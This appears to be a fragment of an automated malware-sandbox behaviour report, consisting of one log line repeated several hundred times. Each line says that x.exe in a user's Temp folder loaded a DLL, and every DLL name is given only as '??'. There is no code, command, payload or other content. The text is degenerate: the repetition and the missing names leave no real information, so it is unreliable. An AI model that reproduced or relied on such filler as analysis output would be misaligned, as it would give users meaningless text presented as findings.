Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
